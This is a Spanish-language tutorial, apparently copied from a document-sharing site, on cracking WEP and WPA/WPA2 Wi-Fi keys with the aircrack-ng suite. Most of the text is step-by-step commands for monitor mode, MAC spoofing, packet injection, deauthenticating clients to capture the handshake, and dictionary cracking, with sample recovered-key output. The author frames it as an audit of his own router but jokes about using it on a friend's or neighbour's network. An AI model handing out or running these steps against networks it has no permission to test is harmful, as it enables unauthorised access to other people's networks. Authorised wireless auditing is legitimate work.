Sei sulla pagina 1di 4

TUTORIAL DE AIRCRACK PARA WEP Y PARA WPA-WPA2 con Ubuntu 8.

10 y tarjeta SMCWUSB-
G con chipset Zydas 1211 con driver zd1211r, y con Wifislax 3.1
Imagen
TUTORIAL DE AIRCRACK PARA WEP Y PARA WPA-WPA2 con Ubuntu 8.10 y tarjeta SMCWUSB-
G con chipset Zydas 1211 con driver zd1211r, y con Wifislax 3.1
ATENCION PREGUNTA:
Siendo jander tanto el nombre de la red a atacar como el de el archivo de paquet
es capturados, y 00:13:F7:1D:B6:CF la MAC del punto de acceso a atacar, dígase su
contraseña WEP y WPA.
Antes de empezar : decir que todo funciona igual de bien en Wifislax, excepto qu
e la tarjeta de red inalambrica usb SMCWUSB-G tuve que que quitarla y volverla a
conectar una vez que estuve dentro de Wifislax, sin configuración, ni necesita dr
ivers ni nada, simplemente quitarla y volverla a pinchar y ya la reconoce Wifisl
ax, no hace falta ayuda chipset ni lanzadores ni ná. En ubuntu 8.10 no hay que hac
er nada, ya reconoce la tarjeta y no hay que buscar drivers ni kernel ni otras c
osas.
Espero que le pueda ayudar a alguien con chipset zydas como a mi me ayudaron los
foros, videos, tutos etc de www.foro.seguridadwireless.net , http://foro.el-hac
ker.com , http://www.youtube.com/watch?v=whYDVSzvJQ8 (estos tres videos recomien
do que se vean antes de empezar, sobre todo los que no tengan ni idea de auditoría
s y también los que les pique el gusanillo de linux) y más gracias a tantos otros qu
e no hay espacio xd.
CUATRO CONCEPTOS BASICOS :
PRIMER REQUISITO IMPRESCINDIBLE :
Ver el tutorial de Alfonso Cruz para sacar claves Wep
SEGUNDOS REQUISITOS NO IMPRESCINDIBLES :
Hay que saber, llegados a este punto, conceptos como DATA, ARP, IVS, y HANDSHAKE
, SINO VUELVE A Ver el tutorial de Alfonso Cruz para sacar claves Wep
Sino. Aquí te los explico yo, como siempre, en cristiano
DATA : son paquetes muy buenos, muy bonitos y muy entrañables, de hecho indican qu
e es una red que puedes auditorizar con posibles buenos resultados, los veras de
spues de hacer un airodum-ng.
PARA AUDITORIAS WEP : NECESITAS 120.000 ARP
ARP : es lo que tienes que capturar en un ataque wep, un paquete muy guai, neces
itas de 40000 a 120000.
IVS : son vectores de inicializacion de los paquetes que te sirven para sacar la
clave wep, también necesitas 80000 o 120000, y también son para asuntos wep.
PARA AUDITORIAS WPA-WPA2 SÓLO NECESITAS UN PAQUETE LLAMADO HANDSHAKE Y NO 120.000
COMO PARA WEP
HANDSHAKE:
Traducido es apreton de manos , o sea el momento en que ordenata y punto de acceso
se vuelven a saludar y se mandan la clave, al reconocerse como colegas , ese es el mo
mento en que el airodump captura ese preciado handshake que contiene laclave, bu
ff mi espalda, me duele de tanto escribir xd, este preciado handshake es fundame
ntal para el ataque wpa-wpa2, porque es el que guarda la clave wpa-wpa2, despues
, simplemente hay que compararlo con el diccionario y voilà.

DICCIONARIO(WORDLIST) :
La pena de todo esto, infelices que habeis leído hasta aquí, es que una clave wpa-wp
a2 no se puede capturar a no ser que sea del tipo manolin233 o tobi8876, o que t
engas un diccionario acojonante, y de esos, desafortunadamente todavía no existen,
si sabeis de alguno me lo mandais a rbauluz@telecable.es
Ahora en serio, y último consejo:
El diccionario deberá estar guardado en la carpeta donde estas haciendo todo: En W
ifislax es: / root
En Ubuntu la del usuario, pero vale cualquiera mientras sepas donde tienes el di
ccionario, lo mejor para los novatos es tener el diccionario en la misma carpeta
dónde haces todo).
LO DEL ATAQUE WPA-WPA2 CON CLIENTE :
Vamos a ver, que como intentes atacar el router de un amigo , que en ese momento no
tenga conectado un pc a su router y con la mula puesta, pues eso, que lo llevas
claro, te llevaría siglos, o toda tu paciencia, la cual es mejor dedicar a tratar
mejor a tu vecino y pedirle la clave, para que amablemente la comparta contigo
y llegar juntos a pagar menos a TIMOFONICA xd.

INDICE DE COMANDOS USADOS(por orden de aparición y uso):


Comandos para WEP:
ifconfig
iwconfig
ifconfig wlan0 up
airmon-ng start wlan0
iwconfig
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
airodump-ng mon0
pulsar control-c para parar airodump
airodump-ng mon0 -w jander -c 6
aireplay-ng -1 0 -e jander -a 00:13:F7:1D:B6:CF -h 00:11:22:33:44:55 mon0
aireplay-ng -3 -b 00:13:F7:1D:B6:CF -h 00:11:22:33:44:55 mon0
aircrack-ng jander*.cap
Comandos para WPA :
ifconfig
iwconfig
ifconfig wlan0 up
airmon-ng start wlan0
iwconfig
airodump-ng -c 6 --bssid 00:13:f7:1d:b6:cf -w jander mon0
aireplay-ng -0 30 -a 00:13:F7:1D:B6:CF -c 00:21:5d:35:02:50 mon0
aircrack-ng -w dictionary_spanish.dic -0 jander*.cap

Nota : el ataque se realizó sobre mi router Smcwbr-14-g, con la mula conectada des
de el cliente en el caso Wpa, con un diccionario, capturando el handshake en 5 m
inutos.
En el caso de la clave WEP, se hizo falseando la MAC con macchanger, tambien con
tráfico, y en unos dos minutos empezó a inyectar como loco, en 10 minutos tenía 20000
0 arps xd.

SACANDO CLAVE WEP


1er PASO : Configurar la tarjeta en modo monitor: AIRMON
ifconfig
iwconfig
ifconfig wlan0 up
airmon-ng start wlan0
airmon-ng start mon0
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0 (como explica Alfonso Cruz en sus tres magi
strales videos que recomiendo ver antes de empezar a meter comandos en la consol
a http://www.youtube.com/watch?v=whYDVSzvJQ8 ).
ifconfig mon0 up
2º PASO: Capturar paquetes: AIRODUMP
airodump-ng mon0 (localizas la red y apunta su mac y su canal)
control-c(Para parar el airodump)
airodump-ng mon0 -w jander -c 6 (lo dejas capturando)
3er PASO: Autentificarse : AIREPLAY, en otra consola
aireplay-ng -1 0 -e jander -a 00:13:F7:1D:B6:CF -h 00:11:22:33:44:55 mon0
si la autentificacion es correcta, debe decir sucessful :) pasas al siguiente pa
so.
4º PASO : Inyectar paquetes: AIREPLAY
aireplay-ng -3 -b 00:13:f7:1D:B6:CF -h 00:11:22:33:44:55 mon0 y cuando llegues a
120000 arps:
5º PASO: Buscar clave en el archivo de captura jander.cap : AIRCRACK
aircrack-ng jander*.cap
KEY FOUND! [ 5A:30:30:30:32:43:46:42:37:35:41:38:32 ] (ASCII: Z0002CFB75A82 )
FIN

SACANDO CLAVE WAP-WAP2


1er Paso : Configurar la tarjeta :AIRMON
ifconfig
iwconfig
ifconfig wlan0 up
airmon-ng start wlan0
airmon-ng start mon0

2º Paso : Capturar paquetes: AIRODUMP


airodump-ng mon0
cuando veas tu punto de acceso a atacar, control-c y en otra consola :
airodump-ng -c 6 --bssid 00:13:F7:1D:B6:CF -w jander mon0
3er Paso: Deautentificar : AIREPLAY en otra consola
aireplay-ng -0 30 -a 00:13:F7:1D:B6:CF -c 00:21:5d:35:02:50 mon0
Después de usar este comando, fijaros de vez en cuando en la pantalla del airodump
, ARRIBA A LA DERECHA, y ahí debe aparecer el preciado handshake y a continuación, e
l 4º paso.
4º Paso : Buscar la clave en el Dicionario :AIRCRACK,en otra consola
aircrack-ng -w dictionary_spanish.dic -o jander*.cap
KEY FOUND! [ CF:CF:CF:CF:CF ]
FIN

Potrebbero piacerti anche